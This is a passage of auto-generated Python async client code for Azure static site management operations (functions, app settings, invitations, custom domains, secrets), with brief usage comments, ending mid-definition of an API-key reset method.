create_or_update_static_site_build_function_app_settings.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/builds/{prId}/config/functionappsettings'} # type: ignore
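# Illustrative sketch: the request body is a StringDictionary whose `properties`
# mapping holds the app-setting key/value pairs (names and values below are placeholders).
#
#   from azure.mgmt.web.v2020_09_01.models import StringDictionary
#
#   settings = StringDictionary(properties={"API_URL": "https://example.invalid"})
#   result = await client.static_sites.create_or_update_static_site_build_function_app_settings(
#       "my-rg", "my-static-site", "<pr-id>", settings)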
def list_static_site_build_functions(
self,
resource_group_name: str,
name: str,
pr_id: str,
**kwargs
) -> AsyncIterable["_models.StaticSiteFunctionOverviewCollection"]:
"""Gets the functions of a particular static site build.
Description for Gets the functions of a particular static site build.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:param pr_id: The stage site identifier.
:type pr_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator-like instance of either StaticSiteFunctionOverviewCollection or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2020_09_01.models.StaticSiteFunctionOverviewCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteFunctionOverviewCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_static_site_build_functions.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'prId': self._serialize.url("pr_id", pr_id, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('StaticSiteFunctionOverviewCollection', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.DefaultErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_static_site_build_functions.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/builds/{prId}/functions'} # type: ignore
async def list_static_site_build_function_app_settings(
self,
resource_group_name: str,
name: str,
pr_id: str,
**kwargs
) -> "_models.StringDictionary":
"""Gets the application settings of a static site.
Description for Gets the application settings of a static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:param pr_id: The stage site identifier.
:type pr_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StringDictionary, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.StringDictionary
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StringDictionary"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.list_static_site_build_function_app_settings.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'prId': self._serialize.url("pr_id", pr_id, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('StringDictionary', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('StringDictionary', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_static_site_build_function_app_settings.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/builds/{prId}/listFunctionAppSettings'} # type: ignore
async def create_or_update_static_site_function_app_settings(
self,
resource_group_name: str,
name: str,
app_settings: "_models.StringDictionary",
**kwargs
) -> "_models.StringDictionary":
"""Creates or updates the function app settings of a static site.
Description for Creates or updates the function app settings of a static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:param app_settings: The function app settings to create or update.
:type app_settings: ~azure.mgmt.web.v2020_09_01.models.StringDictionary
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StringDictionary, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.StringDictionary
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StringDictionary"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_or_update_static_site_function_app_settings.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(app_settings, 'StringDictionary')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('StringDictionary', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('StringDictionary', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update_static_site_function_app_settings.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/config/functionappsettings'} # type: ignore
async def create_user_roles_invitation_link(
self,
resource_group_name: str,
name: str,
static_site_user_roles_invitation_envelope: "_models.StaticSiteUserInvitationRequestResource",
**kwargs
) -> "_models.StaticSiteUserInvitationResponseResource":
"""Creates an invitation link for a user with the role.
Description for Creates an invitation link for a user with the role.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:param static_site_user_roles_invitation_envelope: A JSON representation of the StaticSiteUserInvitationRequestResource properties.
:type static_site_user_roles_invitation_envelope: ~azure.mgmt.web.v2020_09_01.models.StaticSiteUserInvitationRequestResource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StaticSiteUserInvitationResponseResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.StaticSiteUserInvitationResponseResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteUserInvitationResponseResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_user_roles_invitation_link.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(static_site_user_roles_invitation_envelope, 'StaticSiteUserInvitationRequestResource')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('StaticSiteUserInvitationResponseResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_user_roles_invitation_link.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/createUserInvitation'} # type: ignore
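# Illustrative sketch for requesting an invitation link; the envelope field names
# (domain, provider, user_details, roles, num_hours_to_expiration) are assumptions
# about StaticSiteUserInvitationRequestResource and may need adjusting.
#
#   from azure.mgmt.web.v2020_09_01.models import StaticSiteUserInvitationRequestResource
#
#   invitation = await client.static_sites.create_user_roles_invitation_link(
#       "my-rg", "my-static-site",
#       StaticSiteUserInvitationRequestResource(
#           domain="www.example.invalid", provider="github",
#           user_details="octocat", roles="contributor", num_hours_to_expiration=24))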
def list_static_site_custom_domains(
self,
resource_group_name: str,
name: str,
**kwargs
) -> AsyncIterable["_models.StaticSiteCustomDomainOverviewCollection"]:
"""Gets all static site custom domains for a particular static site.
Description for Gets all static site custom domains for a particular static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site resource to search in.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator-like instance of either StaticSiteCustomDomainOverviewCollection or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2020_09_01.models.StaticSiteCustomDomainOverviewCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteCustomDomainOverviewCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_static_site_custom_domains.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('StaticSiteCustomDomainOverviewCollection', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.DefaultErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_static_site_custom_domains.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/customDomains'} # type: ignore
async def create_or_update_static_site_custom_domain(
self,
resource_group_name: str,
name: str,
domain_name: str,
**kwargs
) -> "_models.StaticSiteCustomDomainOverviewARMResource":
"""Creates a new static site custom domain in an existing resource group and static site.
Description for Creates a new static site custom domain in an existing resource group and
static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:param domain_name: The custom domain to create.
:type domain_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StaticSiteCustomDomainOverviewARMResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.StaticSiteCustomDomainOverviewARMResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteCustomDomainOverviewARMResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.create_or_update_static_site_custom_domain.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'domainName': self._serialize.url("domain_name", domain_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.put(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('StaticSiteCustomDomainOverviewARMResource', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('StaticSiteCustomDomainOverviewARMResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update_static_site_custom_domain.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/customDomains/{domainName}'} # type: ignore
async def delete_static_site_custom_domain(
self,
resource_group_name: str,
name: str,
domain_name: str,
**kwargs
) -> None:
"""Deletes a custom domain.
Description for Deletes a custom domain.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:param domain_name: The custom domain to delete.
:type domain_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.delete_static_site_custom_domain.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'domainName': self._serialize.url("domain_name", domain_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_static_site_custom_domain.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/customDomains/{domainName}'} # type: ignore
async def validate_custom_domain_can_be_added_to_static_site(
self,
resource_group_name: str,
name: str,
domain_name: str,
**kwargs
) -> None:
"""Validates a particular custom domain can be added to a static site.
Description for Validates a particular custom domain can be added to a static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:param domain_name: The custom domain to validate.
:type domain_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.validate_custom_domain_can_be_added_to_static_site.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'domainName': self._serialize.url("domain_name", domain_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
validate_custom_domain_can_be_added_to_static_site.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/customDomains/{domainName}/validate'} # type: ignore
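# Illustrative flow combining the two calls defined above: validate the custom domain
# first, then create it (placeholders throughout; both raise HttpResponseError on failure).
#
#   await client.static_sites.validate_custom_domain_can_be_added_to_static_site(
#       "my-rg", "my-static-site", "www.example.invalid")
#   domain = await client.static_sites.create_or_update_static_site_custom_domain(
#       "my-rg", "my-static-site", "www.example.invalid")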
async def detach_static_site(
self,
resource_group_name: str,
name: str,
**kwargs
) -> None:
"""Detaches a static site.
Description for Detaches a static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site to detach.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.detach_static_site.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
detach_static_site.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/detach'} # type: ignore
def list_static_site_functions(
self,
resource_group_name: str,
name: str,
**kwargs
) -> AsyncIterable["_models.StaticSiteFunctionOverviewCollection"]:
"""Gets the functions of a static site.
Description for Gets the functions of a static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator-like instance of either StaticSiteFunctionOverviewCollection or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2020_09_01.models.StaticSiteFunctionOverviewCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteFunctionOverviewCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_static_site_functions.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('StaticSiteFunctionOverviewCollection', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.DefaultErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_static_site_functions.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/functions'} # type: ignore
async def list_static_site_function_app_settings(
self,
resource_group_name: str,
name: str,
**kwargs
) -> "_models.StringDictionary":
"""Gets the application settings of a static site.
Description for Gets the application settings of a static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StringDictionary, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.StringDictionary
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StringDictionary"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.list_static_site_function_app_settings.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('StringDictionary', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('StringDictionary', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_static_site_function_app_settings.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/listFunctionAppSettings'} # type: ignore
async def list_static_site_secrets(
self,
resource_group_name: str,
name: str,
**kwargs
) -> "_models.StringDictionary":
"""Lists the secrets for an existing static site.
Description for Lists the secrets for an existing static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StringDictionary, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.StringDictionary
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StringDictionary"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.list_static_site_secrets.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('StringDictionary', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_static_site_secrets.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/listSecrets'} # type: ignore
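# Illustrative sketch: list_static_site_secrets returns a StringDictionary; the secret
# values live in its `properties` mapping (the exact key names, e.g. a deployment
# token/API key entry, are an assumption).
#
#   secrets = await client.static_sites.list_static_site_secrets("my-rg", "my-static-site")
#   for key in (secrets.properties or {}):
#       print(key)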
async def reset_static_site_api_key(
self,
resource_group_name: str,
name: str,
